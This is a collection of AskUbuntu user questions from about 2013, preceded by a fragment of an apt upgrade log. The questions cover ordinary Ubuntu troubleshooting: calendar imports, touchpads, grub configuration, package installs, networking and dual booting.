3.2.3-0ubuntu7.1 ) , grub-pc : amd64 ( 1.99-21ubuntu3.9 , 1.99-21ubuntu3.10 ) , libmysqlclient18 : amd64 ( 5.5.31-0ubuntu0.12.04.2 , 5.5.32-0ubuntu0.12.04.1 ) , libisccc80 : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , apt-utils : amd64 ( 0.8.16~exp12ubuntu10.10 , 0.8.16~exp12ubuntu10.12 ) , libedata-cal-1.2-13 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , skype : amd64 ( 4.2.0.11-0ubuntu0.12.04.1 , 4.2.0.11-0ubuntu0.12.04.2 ) , linux-firmware : amd64 ( 1.79.4 , 1.79.6 ) , libvlc5 : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , udev : amd64 ( 175-0ubuntu9.3 , 175-0ubuntu9.4 ) , apt : amd64 ( 0.8.16~exp12ubuntu10.10 , 0.8.16~exp12ubuntu10.12 ) , firefox : amd64 ( 22.0+build2-0ubuntu0.12.04.2 , 23.0+build2-0ubuntu0.12.04.1 ) , unity-lens-files : amd64 ( 5.10.0-0ubuntu1 , 5.10.0-0ubuntu1.1 ) , liblwres80 : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , vlc-nox : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , libdbusmenu-glib4 : amd64 ( 0.6.2-0ubuntu0.1 , 0.6.2-0ubuntu0.2 ) , vlc-plugin-notify : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , mysql-client-core-5.5 : amd64 ( 5.5.31-0ubuntu0.12.04.2 , 5.5.32-0ubuntu0.12.04.1 ) , libgwibber2 : amd64 ( 3.4.2-0ubuntu2.2 , 3.4.2-0ubuntu2.3 ) , python-problem-report : amd64 ( 2.0.1-0ubuntu17.3 , 2.0.1-0ubuntu17.4 ) , libunity-core-5.0-5 : amd64 ( 5.18.0-0ubuntu2 , 5.20.0-0ubuntu2 ) , libcroco3 : amd64 ( 0.6.5-1 , 0.6.5-1ubuntu0.1 ) , libcroco3 : i386 ( 0.6.5-1 , 0.6.5-1ubuntu0.1 ) , libwpd-0.9-9 : amd64 ( 0.9.6-2~precise1 , 0.9.8-1~precise1 ) , libedataserver-1.2-15 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , libdbusmenu-gtk4 : amd64 ( 0.6.2-0ubuntu0.1 , 0.6.2-0ubuntu0.2 ) , libdbusmenu-gtk3-4 : amd64 ( 0.6.2-0ubuntu0.1 , 0.6.2-0ubuntu0.2 ) , libebook-1.2-12 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , evince-common : amd64 ( 3.4.0-0ubuntu1.6 , 3.4.0-0ubuntu1.7 ) , libgcrypt11 : amd64 ( 1.5.0-3ubuntu0.1 , 1.5.0-3ubuntu0.2 ) , libgcrypt11 : i386 ( 1.5.0-3ubuntu0.1 , 1.5.0-3ubuntu0.2 ) , libxml2 : amd64 ( 2.7.8.dfsg-5.1ubuntu4.4 , 2.7.8.dfsg-5.1ubuntu4.6 ) , libxml2 : i386 ( 2.7.8.dfsg-5.1ubuntu4.4 , 2.7.8.dfsg-5.1ubuntu4.6 ) , libbind9-80 : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , google-chrome-stable : amd64 ( 28.0.1500.71-r209842 , 28.0.1500.95-r213514 ) , evince : amd64 ( 3.4.0-0ubuntu1.6 , 3.4.0-0ubuntu1.7 ) , libapt-pkg4.12 : amd64 ( 0.8.16~exp12ubuntu10.10 , 0.8.16~exp12ubuntu10.12 ) , libcamel-1.2-29 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , libxml2-dev : amd64 ( 2.7.8.dfsg-5.1ubuntu4.4 , 2.7.8.dfsg-5.1ubuntu4.6 ) , firefox-locale-en : amd64 ( 22.0+build2-0ubuntu0.12.04.2 , 23.0+build2-0ubuntu0.12.04.1 ) , libecal-1.2-10 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , lsb-base : amd64 ( 4.0-0ubuntu20.2 , 4.0-0ubuntu20.3 ) , unity-services : amd64 ( 5.18.0-0ubuntu2 , 5.20.0-0ubuntu2 ) , gwibber-service : amd64 ( 3.4.2-0ubuntu2.2 , 3.4.2-0ubuntu2.3 ) , xul-ext-ubufox : amd64 ( 2.6-0ubuntu0.12.04.1 , 2.7-0ubuntu0.12.04.1 ) , libreoffice-style-human : amd64 ( 4.0.4~rc2-0ubuntu1~precise1 , 4.1.0-0ubuntu1~precise1~ppa1 ) , libraptor2-0 : amd64 ( 2.0.6-1 , 2.0.6-1ubuntu0.1 ) , grub-pc-bin : amd64 ( 1.99-21ubuntu3.9 , 1.99-21ubuntu3.10 ) , gir1.2-gudev-1.0 : amd64 ( 175-0ubuntu9.3 , 175-0ubuntu9.4 ) , vlc : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , skype-bin : i386 ( 4.2.0.11-0ubuntu0.12.04.1 , 4.2.0.11-0ubuntu0.12.04.2 ) , libudev0 : amd64 ( 175-0ubuntu9.3 , 175-0ubuntu9.4 ) , libudev0 : i386 ( 175-0ubuntu9.3 , 175-0ubuntu9.4 ) , jockey-common : amd64 ( 0.9.7-0ubuntu7.7 , 0.9.7-0ubuntu7.9 ) , libisccfg82 : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , gpgv : amd64 ( 1.4.11-3ubuntu2.2 , 1.4.11-3ubuntu2.3 ) , thunderbird-globalmenu : amd64 ( 17.0.7+build1-0ubuntu0.12.04.1 , 17.0.8+build1-0ubuntu0.12.04.1 ) , thunderbird-gnome-support : amd64 ( 17.0.7+build1-0ubuntu0.12.04.1 , 17.0.8+build1-0ubuntu0.12.04.1 ) , jockey-gtk : amd64 ( 0.9.7-0ubuntu7.7 , 0.9.7-0ubuntu7.9 ) , evolution-data-server-common : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , python-apport : amd64 ( 2.0.1-0ubuntu17.3 , 2.0.1-0ubuntu17.4 ) , evolution-data-server : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , liblightdm-gobject-1-0 : amd64 ( 1.2.3-0ubuntu2.2 , 1.2.3-0ubuntu2.3 ) , vlc-data : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , linux-libc-dev : amd64 ( 3.2.0-49.75 , 3.2.0-51.77 ) , grub-common : amd64 ( 1.99-21ubuntu3.9 , 1.99-21ubuntu3.10 ) , grub2-common : amd64 ( 1.99-21ubuntu3.9 , 1.99-21ubuntu3.10 ) , libisc83 : amd64 ( 9.8.1.dfsg.p1-4ubuntu0.6 , 9.8.1.dfsg.p1-4ubuntu0.7 ) , libedataserverui-3.0-1 : amd64 ( 3.2.3-0ubuntu7 , 3.2.3-0ubuntu7.1 ) , libvlccore5 : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , libgwibber-gtk2 : amd64 ( 3.4.2-0ubuntu2.2 , 3.4.2-0ubuntu2.3 ) , apport-gtk : amd64 ( 2.0.1-0ubuntu17.3 , 2.0.1-0ubuntu17.4 ) , mysql-common : amd64 ( 5.5.31-0ubuntu0.12.04.2 , 5.5.32-0ubuntu0.12.04.1 ) , lsb-release : amd64 ( 4.0-0ubuntu20.2 , 4.0-0ubuntu20.3 ) , thunderbird-locale-en : amd64 ( 17.0.7+build1-0ubuntu0.12.04.1 , 17.0.8+build1-0ubuntu0.12.04.1 ) , python-libxml2 : amd64 ( 2.7.8.dfsg-5.1ubuntu4.4 , 2.7.8.dfsg-5.1ubuntu4.6 ) , vlc-plugin-pulse : amd64 ( 2.0.5-0ubuntu0.12.04.1 , 2.0.8-0ubuntu0.12.04.1 ) , gnupg : amd64 ( 1.4.11-3ubuntu2.2 , 1.4.11-3ubuntu2.3 ) end-date : 2013-08-14 08:22:05 start-date : 2013-08-14 13:25:30 commandline : apt-get install curl install : curl : amd64 ( 7.22.0-3ubuntu4.2 ) end-date : 2013-08-14 13:25:38
332681	add event to google calendar from chrome/chromium via .ics file	some event web pages have links to let you add the event to your calendar . they use a variety of techniques to do so . when i click on , for example , great american sing-along , which seems related to the activedataexchange product , using chrome , it just offers to download a file `` adecalendar.ics '' . firefox offers the same option , and also offers to let me open the file with an app of my choosing , but only shows emacs as an option . and kitchen-sink though it may be , by default emacs does n't seem to do any magic with .ics files ; ) i know that if i save it to a file , and go to https : //www.google.com/calendar i can import a .ics file , but that involves a lot of frustrating steps . so how can i just get a one- or two-click method of adding this to my google calendar ? note that if the web site offers the calendar via a `` webcal : '' protocol , it is possible to configure a protocol handler so that gets passed off to the google calendar site , as documented at google calendar as default handler of webcal protocol for ical/ics files .
332688	employing ubuntu webapps integration on wordpress site	how can i integrate unity webapps on my self hosted wordpress site . locally i am getting the quicklist options but is there a way using it will be prompt for integration with the unity like gmail or other websites ?
332689	touchpad not working after installing ubuntu 13.04 on hp sleekbook	i installed ubuntu 13.04 alongside windows 8 on hp sleekbook . but the touchpad is n't working . i can open the terminal through keyboard and certain points are also sensitive to touchscreen . but the touch-pad does n't work . can anybody help me out ? ? ?
332692	how do i fix `` no setup signature found '' error on install	i 'm using the netbootinstallfrominternet procedure : installation/netbootinstallfrominternet using linux and initrd.gz files in my /boot/newinstall directory . it seems to find them ok , but get `` no setup signature found '' message from grub . i 'm using grub 0.91 . any assistance would be greatly appreciated !
332693	can not setup or update anything after a mistaken command	i was trying to setup mongodb for my class work and as there setup tutorial is followed this command : echo 'deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart 10gen ' | sudo tee /etc/apt/sources.list.d/10gen.list after this i ca n't setup anything , i ca n't even use sudo apt-get update
332709	trouble with scrollbars and focus	in ccsm , i have `` click to focus '' , `` raise on focus '' , and `` auto-raise '' checked . i have `` auto raise delay '' 100 and `` focus prevention level `` very high '' when i hover my mouse over a window that does not have the focus , but does have a scroll bar , and i move the scroll wheel on my mouse , the window scroll bar moves up and down , but the focus does not move from the focused window to the window i 'm scrolling . this is bad , because my brain then thinks that window has focus when it does not . invariably i will then begin typing , thinking my new window has focus . this can have disastrous results ; i 've lost folders of email this way . how do i fix this crazy behavior ? i want click to focus for everything , including scrolling .
332710	apt-get and outdated packages	why is it that many packages in apt-get are outdated ? for example , i would like to get the latest implementation of the clojure programming language onto my machine . however , running the command apt-cache search clojure i get the following : clojure - a lisp dialect for the jvm clojure-contrib - user contributed set of libraries for clojure clojure1.2 - lisp dialect for the jvm clojure1.3 - lisp dialect for the jvm leiningen - simple build system for clojure libclojure-maven-plugin-java - clojure plugin for maven libclucy-clojure - clojure interface to the lucene search engine libjava-jdbc-clojure - clojure interface to sql databases via jdbc librobert-hooke-clojure - function wrapper library for clojure libtools-logging-clojure - logging macros for clojure all the clojure implementations are old ( clojure is version 1.1 ) . the newest release of the clojure programming language is 1.5 . why is it that packages are not up to date ? do i need to reconfigure my apt-get program ?
332711	how to install kodak 3250 printer driver ?	my system is ubuntu 13.04 and i have a kodak 3250 aio printer . the test paper printed great and that 's it . i found c2esp_25c-1_i386.deb printer driver from sourceforge . trying to install w/usc i get the following error : dependency is not satisfiable : libcupsdriver1 ( > =1.4.0 ) i would appreciate any help . thanks .
332712	how to use udp connections with torrent clients ?	i just set up ubuntu and i am having lots of trouble getting torrents working . i used to use linux a lot , but have not for years , so i 'm pretty new at this again . i have ports forwarded on my router for udp and torrents . i have checked them and they are open on the router , and using netstat i can see they are open/listening on the computer . i did : sudo iptables -- flush and sudo ufw -- disable to make sure that it was not a firewall causing the problems . when i use http : //checkmytorrentip.com/ it says udp is disabled ( it was working fine on my windows install ) . i ca n't connect to any trackers that are not http . i have tried qbittorrent , deluge , and transmission . none of them will connect to trackers using udp . i usually use a proxy ( btguard ) but i have that disabled while i just try an get the connection working period . any ideas as to what i am doing wrong ?
332717	samba package install stuck with error 255 in any apt	i tried installing samba4 with synaptic , halfway through the install it stopped with error code 255 . so , i closed spm , and went on to other things . today i went to install something else , again half-way through it quit with error code 255 , i clicked on the details link , and it showed that samba was still in process . i rebooted , then tried again , still samba is stuck in the same place . so , after some searching i found another thread here covering the exact thing , and offered the following fix , i quote accepted : the problem is close to this one and to others that now i do n't seem able to find here . i will re-edit when i 'll find them . it is a bug it looks like , and the solution consists in typing sudo rm -rf /var/cache/debconf/* sudo apt-get install -f i opened a terminal and typed in the commands , then tried spm again , you guessed it , samba still stuck in the same place . this even has apt-get locked up . has anyone else had this problem ?
332722	what are the ubuntu 13.04 32-bit desktop system requirements ?	the ubuntu 13.04 32-bit desktop system requirements . what are they ?
332732	ssh to ubuntu machine does n't work when i get out of home	when i tried to connect to ubuntu 13.04 from os x via ssh in home , i can successfully connect to it . but i just got to know that when i tried to connect while i 'm out of home , then i got the following error : ssh : could not resolve hostname myhostname : nodename nor servname provided , or not known . it looks like the cause is two machines reside in different network here , i think . when i tried to search on the web , i saw ip address is conflicted . however , i ca n't understand what it means nor i do n't know it truly causes the problem here in the first place . so how can i solve for the issue here ? i think it requires some sort of manual settings on the part of ubuntu before i connect , if i interprets it correctly . so how can i fix the issue ? and can i connect while i 'm out too ? ( which i believe i can , but am not completely sure ... ) thanks .
332734	virtualhost in localhost is not accessible from localhost when offline , how to fix it ?	i am setting up my own local development web server , mainly for theme development . i 've successfully setup lamp in ubuntu 13.04 64bit desktop , apache works fine . the machine where lamp is installed is also my deskstop station . so i want to access the virtualhost both from the localhost itself and from another machine within my lan . i 've setup my first virtual host named devone.loc i 've already inserted the name inside my hosts file . everything is working and accessible . it 's also accessible within any machines in my lan , i have setup it up in dnsmasq in my dd-wrt router . but then , when i disable my network connection , the virtual host is no longer accessible . but the default virtual host is still accessible without network . what seems to be the problem here ? i also need to access the virtual host within the localhost since it 's also my desktop station . i 've attached my virtual host conf file below : < virtualhost *:80 > documentroot /var/www2 servername devone.loc serveralias www.devone.loc < directory /var/www2 > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > you can easily recreate my problem , when you 're a virtualhost user . disable all your network , and using firefox ( in my case , ff v23 ) browse your local dev site and it will throw server not found error . browsing my site offline in my localhost 's virtualhost is very important for me , i use it to demo or for a project presentation for a client . additional info i forgot to mention that webmin is also installed in my machine . update i 've setup another web server in another linux machine using linuxmint 15 , server is xampp 1.8.2-1 , the end result is the same . i try to setup wordpress while my network is disabled but it 's throwing server not found error or when the directory is empty it 's throwing access forbidden . when i check or ticked the work offline menu of firefox , i get access to the wordpress installation menu , but only the index part , clicking next is no longer accessible again . i 've done several combinations of directives , but i still ca n't get it to work . so , the main problem is ... my virtualhost is not reachable/accessible when all network is disabled . i'ts only reachable/accessible when network is enabled . update - i got it fixed this issue is actually connected to firefox settings , changing the setting did fixed my problem . network.dns.disableipv6 is the firefox 's preference name that i changed it 's boolean value to false so , what i did : opened up firefox and typed in about : config in the address bar . i got prompted with a warning ... this might void your warranty , i clicked i 'll be careful , i promise ! in the search bar just below the tabs , i searched for network.dns.disableipv6 , and when it appeared , i just double clicked it to change it 's value to false . i rebooted my machine and browse to my project 's site , and bam ! finally opened up . for newbies like me , hope this will help you out . i can now sleep peacefully ... thanks to this post . i had sleepless nights searching about this issue , different search strings and phrases yields different search results . i finally reached that right page . i also discovered that this issue was also asked in super user .
332735	ubuntu 32-bit wo n't install on dell inspiron 4000	i am tuning up a laptop for a friend . the laptop originally ran windows me , and is about 13 years old . i recently installed windows xp on it and it ran like a snail . i am now trying to install 32-bit ubuntu or 32-bit zorin os lite on it . xp installed fine , but ubuntu and zorin both become unresponsive after the option to begin the install directly ( without going into the live cd ) . i even tried deleting the xp partition to leave it with 300 gb unpartitioned , unformatted space . noting works , please help ?
332736	syntax error in grub config file	i messed with the /etc/grub.d/30_os-prober and now when i run sudo update-grub i get this : generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic /etc/grub.d/30_os-prober : 66 : /etc/grub.d/30_os-prober : syntax error : `` } '' unexpected ( expecting `` fi '' ) please help ! if you can give you me the same file to compare and see what is different . or give me a different solution . boot repair does n't work ! it has the same problem ! here is my file : # ! /bin/sh set -e # grub-mkconfig helper script . # copyright ( c ) 2006,2007,2008,2009 free software foundation , inc. # # grub is free software : you can redistribute it and/or modify # it under the terms of the gnu general public license as published by # the free software foundation , either version 3 of the license , or # ( at your option ) any later version . # # grub is distributed in the hope that it will be useful , # but without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the # gnu general public license for more details . # # you should have received a copy of the gnu general public license # along with grub . if not , see < http : //www.gnu.org/licenses/ > . prefix= '' /usr '' exec_prefix= '' $ { prefix } '' datarootdir= '' $ { prefix } /share '' . `` $ { datarootdir } /grub/grub-mkconfig_lib '' found_other_os= make_timeout ( ) { if [ `` x $ { found_other_os } '' = `` x '' ] ; then if [ `` x $ { 1 } '' ! = `` x '' ] ; then if [ `` x $ { grub_hidden_timeout_quiet } '' = `` xtrue '' ] ; then verbose= else verbose= '' -- verbose '' fi if [ `` x $ { 1 } '' = `` x0 '' ] ; then cat < < eof if [ `` x\ $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep $ verbose -- interruptible 3 ; then set timeout=0 fi fi fi eof else cat < < eof if [ `` x\ $ { timeout } '' ! = `` x-1 '' ] ; then if sleep $ verbose -- interruptible $ { grub_hidden_timeout } ; then set timeout=0 fi fi eof fi fi fi } eof } adjust_timeout ( ) { if [ `` x $ grub_button_cmos_address '' ! = `` x '' ] ; then cat < < eof if cmostest $ grub_button_cmos_address ; then eof make_timeout `` $ { grub_hidden_timeout_button } '' `` $ { grub_timeout_button } '' echo else make_timeout `` $ { grub_hidden_timeout } '' `` $ { grub_timeout } '' echo fi else make_timeout `` $ { grub_hidden_timeout } '' `` $ { grub_timeout } '' fi } if [ `` x $ { grub_disable_os_prober } '' = `` xtrue '' ] ; then adjust_timeout exit 0 fi if [ -z `` `which os-prober 2 > /dev/null` '' -o -z `` `which linux-boot-prober 2 > /dev/null` '' ] ; then # missing os-prober and/or linux-boot-prober adjust_timeout exit 0 fi osprobed= '' `os-prober | tr ' ' '^ ' | paste -s -d ' '` '' if [ -z `` $ { osprobed } '' ] ; then # empty os-prober output , nothing doing adjust_timeout exit 0 fi osx_entry ( ) { found_other_os=1 cat < < eof menuentry `` $ { longname } ( $ { 2 } -bit ) ( on $ { device } ) '' -- class osx -- class darwin -- class os { eof save_default_entry | sed -e `` s/^/\t/ '' prepare_grub_to_access_device $ { device } | sed -e `` s/^/\t/ '' cat < < eof load_video set do_resume=0 if [ /var/vm/sleepimage -nt10 / ] ; then if xnu_resume /var/vm/sleepimage ; then set do_resume=1 fi fi if [ \ $ do_resume = 0 ] ; then xnu_uuid $ { osxuuid } uuid if [ -f /extra/dsdt.aml ] ; then acpi -e /extra/dsdt.aml fi $ 1 /mach_kernel boot-uuid=\ $ { uuid } rd=*uuid if [ /system/library/extensions.mkext -nt /system/library/extensions ] ; then xnu_mkext /system/library/extensions.mkext else xnu_kextdir /system/library/extensions fi if [ -f /extra/extensions.mkext ] ; then xnu_mkext /extra/extensions.mkext fi if [ -d /extra/extensions ] ; then xnu_kextdir /extra/extensions fi if [ -f /extra/devprop.bin ] ; then xnu_devprop_load /extra/devprop.bin fi if [ -f /extra/splash.jpg ] ; then insmod jpeg xnu_splash /extra/splash.jpg fi if [ -f /extra/splash.png ] ; then insmod png xnu_splash /extra/splash.png fi if [ -f /extra/splash.tga ] ; then insmod tga xnu_splash /extra/splash.tga fi fi } eof } wubi= for os in $ { osprobed } ; do device= '' `echo $ { os } | cut -d ' : ' -f 1` '' longname= '' `echo $ { os } | cut -d ' : ' -f 2 | tr '^ ' ' '` '' label= '' `echo $ { os } | cut -d ' : ' -f 3 | tr '^ ' ' '` '' boot= '' `echo $ { os } | cut -d ' : ' -f 4` '' if [ -z `` $ { longname } '' ] ; then longname= '' $ { label } '' fi echo `` found $ { longname } on $ { device } '' > & 2 case $ { boot } in chain ) case $ { longname } in windows* ) if [ -z `` $ wubi '' ] ; then if [ -x /usr/share/lupin-support/grub-mkimage ] & & \ /usr/share/lupin-support/grub-mkimage -- test ; then wubi=yes else wubi=no fi fi if [ `` $ wubi '' = yes ] ; then echo `` skipping $ { longname } on wubi system '' > & 2 continue fi ; ; esac found_other_os=1 cat < < eof menuentry `` $ { longname } ( on $ { device } ) '' -- class windows -- class os { eof save_default_entry | sed -e `` s/^/\t/ '' prepare_grub_to_access_device $ { device } | sed -e `` s/^/\t/ '' case $ { longname } in windows\ vista*|windows\ 7*|windows\ server\ 2008* ) ; ; * ) cat < < eof drivemap -s ( hd0 ) \ $ { root } eof ; ; esac cat < < eof chainloader +1 } eof ; ; linux ) linuxprobed= '' `linux-boot-prober $ { device } 2 > /dev/null | tr ' ' '^ ' | paste -s -d ' '` '' prepare_boot_cache= for linux in $ { linuxprobed } ; do lroot= '' `echo $ { linux } | cut -d ' : ' -f 1` '' lboot= '' `echo $ { linux } | cut -d ' : ' -f 2` '' llabel= '' `echo $ { linux } | cut -d ' : ' -f 3 | tr '^ ' ' '` '' lkernel= '' `echo $ { linux } | cut -d ' : ' -f 4` '' linitrd= '' `echo $ { linux } | cut -d ' : ' -f 5` '' lparams= '' `echo $ { linux } | cut -d ' : ' -f 6- | tr '^ ' ' '` '' if [ -z `` $ { llabel } '' ] ; then llabel= '' $ { longname } '' fi if [ `` $ { lroot } '' ! = `` $ { lboot } '' ] ; then lkernel= '' $ { lkernel # /boot } '' linitrd= '' $ { linitrd # /boot } '' fi if [ -z `` $ { prepare_boot_cache } '' ] ; then prepare_boot_cache= '' $ ( prepare_grub_to_access_device $ { lboot } | sed -e `` s/^/\t/ '' ) '' [ `` $ { prepare_boot_cache } '' ] || continue fi found_other_os=1 cat < < eof menuentry `` $ { llabel } ( on $ { device } ) '' -- class gnu-linux -- class gnu -- class os { eof save_default_entry | sed -e `` s/^/\t/ '' printf ' % s\n ' `` $ { prepare_boot_cache } '' cat < < eof linux $ { lkernel } $ { lparams } eof if [ -n `` $ { linitrd } '' ] ; then cat < < eof initrd $ { linitrd } eof fi cat < < eof } eof done ; ; macosx ) osxuuid= '' `grub-probe -- target=fs_uuid -- device $ { device } 2 > /dev/null` '' osx_entry xnu_kernel 32 osx_entry xnu_kernel64 64 ; ; hurd ) found_other_os=1 cat < < eof menuentry `` $ { longname } ( on $ { device } ) '' -- class hurd -- class gnu -- class os { eof save_default_entry | sed -e `` s/^/\t/ '' prepare_grub_to_access_device $ { device } | sed -e `` s/^/\t/ '' grub_device= '' ` $ { grub_probe } -- device $ { device } -- target=drive` '' mach_device= '' `echo `` $ { grub_device } '' | sed -e 's/ ( \ ( hd.*\ ) , msdos\ ( . *\ ) ) /\1s\2/'` '' grub_fs= '' ` $ { grub_probe } -- device $ { device } -- target=fs` '' case `` $ { grub_fs } '' in *fs ) hurd_fs= '' $ { grub_fs } '' ; ; * ) hurd_fs= '' $ { grub_fs } fs '' ; ; esac cat < < eof multiboot /boot/gnumach.gz root=device : $ { mach_device } module /hurd/ $ { hurd_fs } .static $ { hurd_fs } -- readonly \\ -- multiboot-command-line='\ $ { kernel-command-line } ' \\ -- host-priv-port='\ $ { host-port } ' \\ -- device-master-port='\ $ { device-port } ' \\ -- exec-server-task='\ $ { exec-task } ' -t typed '\ $ { root } ' \\ '\ $ ( task-create ) ' '\ $ ( task-resume ) ' module /lib/ld.so.1 exec /hurd/exec '\ $ ( exec-task=task-create ) ' } eof ; ; * ) echo `` $ { longname } is not yet supported by grub-mkconfig . '' > & 2 ; ; esac done adjust_timeout
332739	malware in ubuntu 13.10 ?	this is the situation i 'm dealing with : i plugged my usb in my laptop , then i created a folder within it , and nautilus stopped working for a while , i unplugged the usb and plugged back in , but this time there was 2 folders created , i have no access to anyone of them from ubuntu , not even starting nautilus as root , the only way to see the files is in a virtual machine using windows xp . when accessing the folder via terminal and typing `` dir '' within the folder it 'll show this : '\002. , \001 # \r\003aåa█ÿj . `` σ╗ ë.öaa n.. sg∩▄ç @ uσ.\n╟* αpez╔╤c≥.τ╬╣ ( .\006\004 ░\ ^¢\027 ( åc.└½╜ \004▄eöqw\004ç.f╔ê n.0 sg_≈¬\023m½.┼≥═ α : \016└p [ z╛.e█\023 *.\t a.e ependenc.y > └za.1ì¡ \001 ═æ┴e≤t\024ó.½s╪ ▄èqƒid╚╦.╦▐² n'\017¼▀ ! τ╝. $ t⌡ -sk\036\ ε░ƒ.█²\026 γ ] euy╢╒╗.╦ê\016 \001 \020æ [ f\001┤╥ä.╔\n= \të¬╣r ( ¢w.b\021z n.3 \t.so γ≥g▄\037z1s.\004ßå \001 ⁿ\fæ√ ] ╜g % .\016îh essorarc.hit n/7ûöα.\002.· & ε \t.so \035■\017╤γºa╞ . *åt \001 ∞\b█ $ æ╬ô\002.₧╤√ essorarc.hit n.a s.r ╟≡┤γxj₧p.\037zk \001 æ , ┐_ôs\026ε.\021\016\b estedpri.vil ndalone= . `` ye ⁿ▄ß≤\026¬è % .¡û¬ ├ : γ╦σl╚\020.αd∙ \001 æ│t~\022ô≡σ.\017╤\024 e.t n.f s\034╢ßáσºe.0\023╢ δ╤\002ìu\a|₧.╚─╟ \001 \025╒æ\016 ! \026w┌.└_¬ e.t np┼ ( ªxπº.⌠\004 ƒ ) ╕ßùl_s.ñ╕\031 ε\003 \001 a.f èu5» $ ε⌡s.4ºv n.t ß·╓▌ ; █ü┌.\fδ╗ ε\003 \001. , \001\v a.f êvuè÷ , ü╝.╝╔\n +n\002t\002∙s╖.▄v\003 ▓\035ß=▄γp» . : ║5 \\╔ε╨\bε_\b. # n▀ \001. , \001\v ╓ ; *·╔\025\017à.í ] $ ëx\030`m\022╛£.╟|æ nvoker '' .uia s.t θ\003 \001. , \001\v ≥╪\t»╜√▀a.ìvm é¿ & zθ╓\nó.▄7æ ╜─┐nδ.╕\030.ô╠\177 stinfo > ∙ú.¬ñ\016 \003 ╖0├0»0 \022b■ # ▌e╥ó.i ) \a i.2 \006¿ó±╪\177n\005. % cφ *ü\020\r\023╜╦╪.ñ\033\v $ 2f\t┤₧≈.α╡\032 0.4 ╡bjô\r≈ } ⌠.╝╫= =≥ ( »i\035|┬.4ca \ròo\0054 ? 7`.╛ '' ñ ╧\025ù @ /⌠ > o.e|9 \n . └¼\026\005ä-t_ . { b.p ╥ia╩ ! 3╜γ.δyσ ö\001╬öθáⁿ '' . `` ≥╥ u±ò\022 '' ╦\f '' . @ ? v ç \ 0¿│\006▐ba.⌠▐\\ \022b└u≤i┐─.|▌╟ ibility > ..\035ï { `` \ manife.stv \b.s ytoken= '' .659 é a , éä╝┘┘y\t.ne8 m─f } ï\004é\020 \b.s ÿ\016╧░θ\024u\033.╫v╘ é \001.a \006êb'╪╜ß╞ . { ╛æ mkx├å½ûω.u\017\002 \b.s z1ÿß9εσs.╒¡¢ \025 . é \020.a\001\001 ecurity > .7 : êh╗z╜+\020.\022lf ╓\032/m.\006w╥ schemas-.mic zr ] ¬6n_½.x▄· ä7ï\032íqf≥.\025s\177 e╚ï^ , ! @ ¬.9½ò mw┬ : ╪ε\036ƒ.╓\021æ s.e z\177\037zê╤┌s.± ; ─ ª\ █*¬ # =â.╨╨· ┼╢\031ë∩¡ $ ≤.─îî m\033δ├2┌\vä.b∩ . s.e α├4çx\f⌡≡. # 7\037 ä¬\025ä4^ $ \n.─\016é é≈╘m\n¢\016┐.è\177╚ mω·«æ╖┐┤.╚\177δ s.e \177αçhº\003▌▐.╘qπ a║\037╔à8jx.┴æ╜ ±«ëñ╥ì\t■. # ≈┌ n.. s.e αép|ä╙\034^.z╗¼ i ca n't delete anything . help ( ? )
332741	importing a virtual machine inside another virtual machine	i have a hadoop cluster of vms hosted on virtualbox . the vms are all ubuntu , and the host system is windows 7 . how can i import all of these vms into 1 ubuntu vm ?
332744	dual booting driver issue	i would like to dual boot ubuntu with the already installed windows 7 . i have enough space on my hard drive for ubuntu , but i have four primary partitions already factory made in my computer . this means something has to give and being fairly new i do n't know all of the details of what each of the drives do and i do n't want to mess things up . i do n't even know if i can actually do any these things , but i am wondering if i can : delete one of my existing partitions ( putting it in a dvd in case i need the recovery tools ) change one of the partitions to be an extended partition any other option that will allow me to keep windows and the recovery tools my laptop is a toshiba satellite c650d-02q the partitions are [ unnamed ] 1.46 gb [ c : ] 396.40 gb ( i shrank it to make room for the partition i cant make ) 39.06 unallocated [ unnamed ] 18.15 gb ( my best guess as to what is is , is recovery tools ) [ unnamed ] 10.68 gb ( again do n't really know what this one is ) i am really looking for any solution that will allow me to safely dual boot w7 and ubuntu . any suggestions or help is very much appreciated . i would really like to be running ubuntu soon . thank you
